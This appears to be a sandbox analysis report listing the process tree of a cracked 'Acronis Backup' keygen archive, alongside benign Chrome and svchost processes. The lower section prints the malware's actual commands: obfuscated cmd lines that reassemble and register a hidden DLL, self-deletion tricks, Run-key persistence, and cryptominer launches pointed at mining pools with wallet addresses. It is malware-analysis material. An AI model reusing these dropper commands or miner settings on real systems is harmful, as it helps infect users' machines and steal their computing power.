C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1640,11490125665354027102,6981403645575125135,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7732 /prefetch:82⤵PID:4548
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1640,11490125665354027102,6981403645575125135,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7872 /prefetch:82⤵PID:3960
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1640,11490125665354027102,6981403645575125135,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7884 /prefetch:82⤵PID:5108
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1640,11490125665354027102,6981403645575125135,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8264 /prefetch:82⤵PID:4472
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1640,11490125665354027102,6981403645575125135,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8404 /prefetch:82⤵PID:4280
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1640,11490125665354027102,6981403645575125135,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8204 /prefetch:82⤵PID:4960
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1640,11490125665354027102,6981403645575125135,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7840 /prefetch:82⤵PID:5040
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1640,11490125665354027102,6981403645575125135,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8556 /prefetch:82⤵PID:5084
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1640,11490125665354027102,6981403645575125135,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8568 /prefetch:82⤵PID:5076
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1640,11490125665354027102,6981403645575125135,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8580 /prefetch:82⤵PID:5128
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1640,11490125665354027102,6981403645575125135,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8540 /prefetch:82⤵PID:5116
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1640,11490125665354027102,6981403645575125135,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7860 /prefetch:82⤵PID:5212
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1640,11490125665354027102,6981403645575125135,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6392 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:5252 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1640,11490125665354027102,6981403645575125135,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3988 /prefetch:82⤵PID:5320
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1640,11490125665354027102,6981403645575125135,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3468 /prefetch:82⤵PID:5332
-
    C:\Program Files\Google\Chrome\Application\chrome.exe  (PID 5396)
      cmd: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1640,11490125665354027102,6981403645575125135,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=52 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6504 /prefetch:1
    C:\Program Files\Google\Chrome\Application\chrome.exe  (PID 5452)
      cmd: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1640,11490125665354027102,6981403645575125135,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=53 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4224 /prefetch:1
    C:\Program Files\Google\Chrome\Application\chrome.exe  (PID 5532)
      cmd: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1640,11490125665354027102,6981403645575125135,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=54 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8904 /prefetch:1
    C:\Program Files\Google\Chrome\Application\chrome.exe  (PID 5600)
      cmd: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1640,11490125665354027102,6981403645575125135,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=9020 /prefetch:8
      - Suspicious behavior: EnumeratesProcesses
    C:\Program Files\Google\Chrome\Application\chrome.exe  (PID 5652)
      cmd: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --field-trial-handle=1640,11490125665354027102,6981403645575125135,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2120 /prefetch:8
    C:\Program Files\Google\Chrome\Application\chrome.exe  (PID 5692)
      cmd: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1640,11490125665354027102,6981403645575125135,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=9120 /prefetch:8
      - Suspicious behavior: EnumeratesProcesses
    C:\Program Files\Google\Chrome\Application\chrome.exe  (PID 5740)
      cmd: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1640,11490125665354027102,6981403645575125135,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=9144 /prefetch:8
      - Suspicious behavior: EnumeratesProcesses
    C:\Program Files\Google\Chrome\Application\chrome.exe  (PID 5780)
      cmd: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1640,11490125665354027102,6981403645575125135,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=776 /prefetch:8
    C:\Program Files\Google\Chrome\Application\chrome.exe  (PID 5796)
      cmd: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1640,11490125665354027102,6981403645575125135,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8616 /prefetch:8
      - Suspicious behavior: EnumeratesProcesses
    C:\Program Files\Google\Chrome\Application\chrome.exe  (PID 5884)
      cmd: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1640,11490125665354027102,6981403645575125135,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8616 /prefetch:8
    C:\Program Files\Google\Chrome\Application\chrome.exe  (PID 5928)
      cmd: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1640,11490125665354027102,6981403645575125135,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2264 /prefetch:8
    C:\Users\Admin\AppData\Local\Google\Chrome\User Data\SwReporter\91.263.200\software_reporter_tool.exe  (PID 5964)
      cmd: "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\SwReporter\91.263.200\software_reporter_tool.exe" --engine=2 --scan-locations=1,2,3,4,5,6,7,8,10 --disabled-locations=9,11 --session-id=LPXgXS7zDI82Cqh4oGcGOzaEyFJ3Ky8BaGqAhI9p --registry-suffix=ESET --srt-field-trial-group-name=NewCleanerUIExperiment
      - Executes dropped EXE
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
        \??\c:\users\admin\appdata\local\google\chrome\user data\swreporter\91.263.200\software_reporter_tool.exe  (PID 6012)
          cmd: "c:\users\admin\appdata\local\google\chrome\user data\swreporter\91.263.200\software_reporter_tool.exe" --crash-handler "--database=c:\users\admin\appdata\local\Google\Software Reporter Tool" --url=https://clients2.google.com/cr/report --annotation=plat=Win32 --annotation=prod=ChromeFoil --annotation=ver=91.263.200 --initial-client-data=0x244,0x248,0x24c,0x214,0x250,0x7ff70ed03270,0x7ff70ed03280,0x7ff70ed03290
          - Executes dropped EXE
          - Suspicious use of AdjustPrivilegeToken
        \??\c:\users\admin\appdata\local\google\chrome\user data\swreporter\91.263.200\software_reporter_tool.exe  (PID 6076)
          cmd: "c:\users\admin\appdata\local\google\chrome\user data\swreporter\91.263.200\software_reporter_tool.exe" --use-crash-handler-with-id="\\.\pipe\crashpad_5964_LGZTVMBEYVXXUYXI" --sandboxed-process-id=2 --init-done-notifier=692 --sandbox-mojo-pipe-token=11966560470509622693 --mojo-platform-channel-handle=668 --engine=2
          - Executes dropped EXE
          - Loads dropped DLL
          - Suspicious use of AdjustPrivilegeToken
        \??\c:\users\admin\appdata\local\google\chrome\user data\swreporter\91.263.200\software_reporter_tool.exe  (PID 6096)
          cmd: "c:\users\admin\appdata\local\google\chrome\user data\swreporter\91.263.200\software_reporter_tool.exe" --use-crash-handler-with-id="\\.\pipe\crashpad_5964_LGZTVMBEYVXXUYXI" --sandboxed-process-id=3 --init-done-notifier=912 --sandbox-mojo-pipe-token=10323606084823434485 --mojo-platform-channel-handle=908
          - Executes dropped EXE
          - Suspicious use of AdjustPrivilegeToken
    C:\Program Files\Google\Chrome\Application\chrome.exe  (PID 5972)
      cmd: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1640,11490125665354027102,6981403645575125135,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1588 /prefetch:8
      - Suspicious behavior: EnumeratesProcesses
    C:\Program Files\Google\Chrome\Application\chrome.exe  (PID 6124)
      cmd: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1640,11490125665354027102,6981403645575125135,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5088 /prefetch:8
    C:\Program Files\Google\Chrome\Application\chrome.exe  (PID 4952)
      cmd: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1640,11490125665354027102,6981403645575125135,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=2032 /prefetch:2
      - Suspicious behavior: EnumeratesProcesses
    C:\Program Files\Google\Chrome\Application\chrome.exe  (PID 4216)
      cmd: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1640,11490125665354027102,6981403645575125135,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2032 /prefetch:8
    C:\Program Files\Google\Chrome\Application\chrome.exe  (PID 4836)
      cmd: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1640,11490125665354027102,6981403645575125135,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8056 /prefetch:8
    C:\Program Files\Google\Chrome\Application\chrome.exe  (PID 4628)
      cmd: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1640,11490125665354027102,6981403645575125135,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2032 /prefetch:8
    C:\Program Files\Google\Chrome\Application\chrome.exe  (PID 4992)
      cmd: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1640,11490125665354027102,6981403645575125135,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6740 /prefetch:8
    C:\Program Files\Google\Chrome\Application\chrome.exe  (PID 3956)
      cmd: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1640,11490125665354027102,6981403645575125135,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2044 /prefetch:8
    C:\Program Files\Google\Chrome\Application\chrome.exe  (PID 5284)
      cmd: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1640,11490125665354027102,6981403645575125135,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1624 /prefetch:8
    C:\Program Files\Google\Chrome\Application\chrome.exe  (PID 3424)
      cmd: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1640,11490125665354027102,6981403645575125135,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=9156 /prefetch:8
    C:\Program Files\Google\Chrome\Application\chrome.exe  (PID 2360)
      cmd: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1640,11490125665354027102,6981403645575125135,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8116 /prefetch:8
    C:\Program Files\Google\Chrome\Application\chrome.exe  (PID 4212)
      cmd: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1640,11490125665354027102,6981403645575125135,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1012 /prefetch:8
    C:\Program Files\Google\Chrome\Application\chrome.exe  (PID 5380)
      cmd: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1640,11490125665354027102,6981403645575125135,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3548 /prefetch:8
    C:\Program Files\Google\Chrome\Application\chrome.exe  (PID 5356)
      cmd: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1640,11490125665354027102,6981403645575125135,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3540 /prefetch:8
    C:\Program Files\Google\Chrome\Application\chrome.exe  (PID 4232)
      cmd: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1640,11490125665354027102,6981403645575125135,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8948 /prefetch:8
    C:\Program Files\Google\Chrome\Application\chrome.exe  (PID 2844)
      cmd: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1640,11490125665354027102,6981403645575125135,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7876 /prefetch:8
    C:\Program Files\Google\Chrome\Application\chrome.exe  (PID 4436)
      cmd: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1640,11490125665354027102,6981403645575125135,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1076 /prefetch:8
      - Suspicious behavior: EnumeratesProcesses

c:\windows\system32\svchost.exe  (PID 2720)
  cmd: c:\windows\system32\svchost.exe -k netsvcs -s Browser

c:\windows\system32\svchost.exe  (PID 2556)
  cmd: c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT

c:\windows\system32\svchost.exe  (PID 2544)
  cmd: c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
  - Suspicious use of AdjustPrivilegeToken

c:\windows\system32\svchost.exe  (PID 1956)
  cmd: c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection

c:\windows\system32\svchost.exe  (PID 1420)
  cmd: c:\windows\system32\svchost.exe -k netsvcs -s SENS

c:\windows\system32\svchost.exe  (PID 1244)
  cmd: c:\windows\system32\svchost.exe -k netsvcs -s Themes

c:\windows\system32\svchost.exe  (PID 1236)
  cmd: c:\windows\system32\svchost.exe -k netsvcs -s UserManager

c:\windows\system32\svchost.exe  (PID 396)
  cmd: c:\windows\system32\svchost.exe -k netsvcs -s Schedule

\??\c:\windows\system32\svchost.exe  (PID 4264)
  cmd: c:\windows\system32\svchost.exe -k netsvcs -s BITS
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
    C:\Windows\system32\svchost.exe  (PID 2060)
      cmd: C:\Windows\system32\svchost.exe -k SystemNetworkService
      - Checks processor information in registry
      - Modifies data under HKEY_USERS
    C:\Windows\system32\svchost.exe  (PID 4232)
      cmd: C:\Windows\system32\svchost.exe -k SystemNetworkService
      - Drops file in System32 directory
      - Checks processor information in registry
      - Modifies data under HKEY_USERS
      - Modifies registry class

C:\Windows\System32\rundll32.exe  (PID 5492)
  cmd: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Users\Admin\AppData\Local\Temp\Temp2_Acronis_Backup_For_Vmware_9_0_crack.zip\Acronis_Backup_For_Vmware_9_0_crack.exe  (PID 5672)
  cmd: "C:\Users\Admin\AppData\Local\Temp\Temp2_Acronis_Backup_For_Vmware_9_0_crack.zip\Acronis_Backup_For_Vmware_9_0_crack.exe"
    C:\Windows\SysWOW64\cmd.exe  (PID 5628)
      cmd: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe  (PID 1840)
          cmd: keygen-pr.exe -p83fsase3Ge
          - Executes dropped EXE
            C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe  (PID 3256)
              cmd: "C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe"
              - Executes dropped EXE
              - Suspicious use of SetThreadContext
              - Suspicious behavior: EnumeratesProcesses
                C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe  (PID 6104)
                  cmd: C:\Users\Admin\AppData\Local\Temp\RarSFX2\key.exe -txt -scanlocal -file:potato.dat
                  - Executes dropped EXE
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exe  (PID 2320)
          cmd: keygen-step-1.exe
          - Executes dropped EXE
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe  (PID 1772)
          cmd: keygen-step-5.exe
          - Executes dropped EXE
            C:\Windows\SysWOW64\cmd.exe  (PID 5888)
              cmd: "C:\Windows\System32\cmd.exe" /q /C TYPE "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe"> ..\DuAHpZZ.eXe && START ..\DuaHPZz.exe /PFYuNZ3YH7rnGdojnKG & IF "" =="" for%a in ("C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe" ) do taskkill /F -im "%~nxa" > nUL
                C:\Users\Admin\AppData\Local\Temp\DuAHpZZ.eXe  (PID 5080)
                  cmd: ..\DuaHPZz.exe /PFYuNZ3YH7rnGdojnKG
                  - Executes dropped EXE
                    C:\Windows\SysWOW64\cmd.exe  (PID 4568)
                      cmd: "C:\Windows\System32\cmd.exe" /q /C TYPE "C:\Users\Admin\AppData\Local\Temp\DuAHpZZ.eXe"> ..\DuAHpZZ.eXe && START ..\DuaHPZz.exe /PFYuNZ3YH7rnGdojnKG & IF "/PFYuNZ3YH7rnGdojnKG " =="" for%a in ("C:\Users\Admin\AppData\Local\Temp\DuAHpZZ.eXe" ) do taskkill /F -im "%~nxa" > nUL
                    C:\Windows\SysWOW64\cmd.exe  (PID 6028)
                      cmd: "C:\Windows\system32\cmd.exe" /cEChO | sET /p = "MZ" > N_dF.5TS & coPY /b /Y N_df.5TS+ZStGPF.Z + Y5GIu_SZ.Hk + HSUF.~No + YS5KQR.dP +XHHm_.HW+ Fi3ni~X.GT + J_DWF.9I + 2AZqC.EK+ j9KBFF~.BZX+EZMJlRKC.Zv ..\hVzCtOPX.7V > nUl & STaRT regsvr32 /U ..\HVzCtOPx.7V -s & DEl /q * > NUl
                        C:\Windows\SysWOW64\cmd.exe  (PID 3960)
                          cmd: C:\Windows\system32\cmd.exe /S /D /c" sET /p = "MZ" 1>N_dF.5TS"
                        C:\Windows\SysWOW64\cmd.exe  (PID 3952)
                          cmd: C:\Windows\system32\cmd.exe /S /D /c" EChO "
                        C:\Windows\SysWOW64\regsvr32.exe  (PID 1044)
                          cmd: regsvr32 /U ..\HVzCtOPx.7V -s
                          - Loads dropped DLL
                          - Suspicious use of NtCreateThreadExHideFromDebugger
                C:\Windows\SysWOW64\taskkill.exe  (PID 4860)
                  cmd: taskkill /F -im "keygen-step-5.exe"
                  - Kills process with taskkill
                  - Suspicious use of AdjustPrivilegeToken
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-6.exe  (PID 4260)
          cmd: keygen-step-6.exe
          - Executes dropped EXE
          - Modifies system certificate store
            C:\Users\Admin\AppData\Roaming\24C.tmp.exe  (PID 60)
              cmd: "C:\Users\Admin\AppData\Roaming\24C.tmp.exe"
              - Executes dropped EXE
              - Loads dropped DLL
                C:\Windows\SysWOW64\cmd.exe  (PID 5592)
                  cmd: cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Roaming\24C.tmp.exe"
                    C:\Windows\SysWOW64\timeout.exe  (PID 5812)
                      cmd: timeout /T 10 /NOBREAK
                      - Delays execution with timeout.exe
            C:\Users\Admin\AppData\Roaming\1A1B.tmp.exe  (PID 904)
              cmd: "C:\Users\Admin\AppData\Roaming\1A1B.tmp.exe"
              - Executes dropped EXE
              - Adds Run key to start application
              - Suspicious use of SetThreadContext
                C:\Windows\system32\msiexec.exe  (PID 4996)
                  cmd: -P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.w14456@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 99999
                C:\Windows\system32\msiexec.exe  (PID 364)
                  cmd: -o pool.minexmr.com:4444 -u 87rRyMkZM4pNgAZPi5NX3DdxksaoNgd7bZUBVe3A9uemAhxc8EQJ6dAPZg2mYTwoezgJWNfTpFFmnVYWXqcNDMhLF7ihFgM.w23936 --cpu-max-threads-hint 50 -r 9999
                  - Blocklisted process makes network request
            C:\Users\Admin\AppData\Roaming\1AA9.tmp.exe  (PID 5368)
              cmd: "C:\Users\Admin\AppData\Roaming\1AA9.tmp.exe"
              - Executes dropped EXE
              - Drops startup file
            C:\Windows\SysWOW64\cmd.exe  (PID 3340)
              cmd: "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-6.exe" >> NUL
                C:\Windows\SysWOW64\PING.EXE  (PID 5164)
                  cmd: ping 127.0.0.1
                  - Runs ping.exe
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe  (PID 1720)
          cmd: keygen-step-3.exe
          - Executes dropped EXE
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exe  (PID 1452)
          cmd: keygen-step-4.exe
          - Executes dropped EXE
          - Checks computer location settings
            C:\Users\Admin\AppData\Local\Temp\RarSFX2\Crack.exe  (PID 3320)
              cmd: "C:\Users\Admin\AppData\Local\Temp\RarSFX2\Crack.exe"
              - Executes dropped EXE
              - Checks computer location settings
                C:\Windows\SysWOW64\rUNdlL32.eXe  (PID 188)
                  cmd: "C:\Windows\system32\rUNdlL32.eXe" "C:\Users\Admin\AppData\Local\Temp\install.dll",install
                  - Loads dropped DLL
                  - Modifies registry class
                  - Suspicious behavior: EnumeratesProcesses
                  - Suspicious use of AdjustPrivilegeToken
            C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe  (PID 4548)
              cmd: "C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"
              - Executes dropped EXE
              - Drops file in Program Files directory
                C:\Program Files (x86)\Browzar\ix78ESOrnjfX.exe  (PID 1640)
                  cmd: "C:\Program Files (x86)\Browzar\ix78ESOrnjfX.exe"
                  - Executes dropped EXE
                  - Suspicious use of SetThreadContext
                    C:\Program Files (x86)\Browzar\ix78ESOrnjfX.exe  (PID 5560)
                      cmd: "C:\Program Files (x86)\Browzar\ix78ESOrnjfX.exe"
                      - Executes dropped EXE
                        C:\Windows\SysWOW64\WerFault.exe  (PID 5412)
                          cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 5560 -s 24
                          - Program crash
                C:\Program Files (x86)\Browzar\Browzar.exe  (PID 4708)
                  cmd: "C:\Program Files (x86)\Browzar\Browzar.exe"
                  - Executes dropped EXE
                  - Checks whether UAC is enabled
                  - Suspicious use of SetWindowsHookEx
                    C:\Windows\SysWOW64\WerFault.exe  (PID 4516)
                      cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 4708 -s 2252
                      - Program crash
                      - Suspicious behavior: EnumeratesProcesses
                      - Suspicious use of AdjustPrivilegeToken
            C:\Users\Admin\AppData\Local\Temp\RarSFX2\GloryWSetp.exe  (PID 3320)
              cmd: "C:\Users\Admin\AppData\Local\Temp\RarSFX2\GloryWSetp.exe"
              - Executes dropped EXE
                C:\Users\Admin\AppData\Roaming\5801742.exe  (PID 4688)
                  cmd: "C:\Users\Admin\AppData\Roaming\5801742.exe"
                  - Executes dropped EXE
                  - Suspicious behavior: EnumeratesProcesses
                C:\Users\Admin\AppData\Roaming\2625955.exe  (PID 5080)
                  cmd: "C:\Users\Admin\AppData\Roaming\2625955.exe"
                  - Executes dropped EXE
                  - Adds Run key to start application
                    C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe  (PID 1252)
                      cmd: "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                      - Executes dropped EXE
                C:\Users\Admin\AppData\Roaming\5191048.exe  (PID 4512)
                  cmd: "C:\Users\Admin\AppData\Roaming\5191048.exe"
                  - Executes dropped EXE
                  - Suspicious use of SetThreadContext
                    C:\Users\Admin\AppData\Roaming\5191048.exe  (PID 1772)
                      cmd: "{path}"
                      - Executes dropped EXE
                C:\Users\Admin\AppData\Roaming\2600165.exe  (PID 3520)
                  cmd: "C:\Users\Admin\AppData\Roaming\2600165.exe"
                  - Executes dropped EXE
                  - Suspicious use of SetThreadContext
                    C:\Users\Admin\AppData\Roaming\2600165.exe  (PID 1708)
                      cmd: "{path}"
                      - Executes dropped EXE
                      - Suspicious behavior: EnumeratesProcesses
                C:\Users\Admin\AppData\Roaming\1597176.exe  (PID 3696)
                  cmd: "C:\Users\Admin\AppData\Roaming\1597176.exe"
                  - Executes dropped EXE
                  - Suspicious use of SetThreadContext
                    C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe  (PID 5652)
                      cmd: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AddInProcess32.exe
                    C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe  (PID 5644)
                      cmd: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AddInProcess32.exe
                      - Suspicious behavior: EnumeratesProcesses
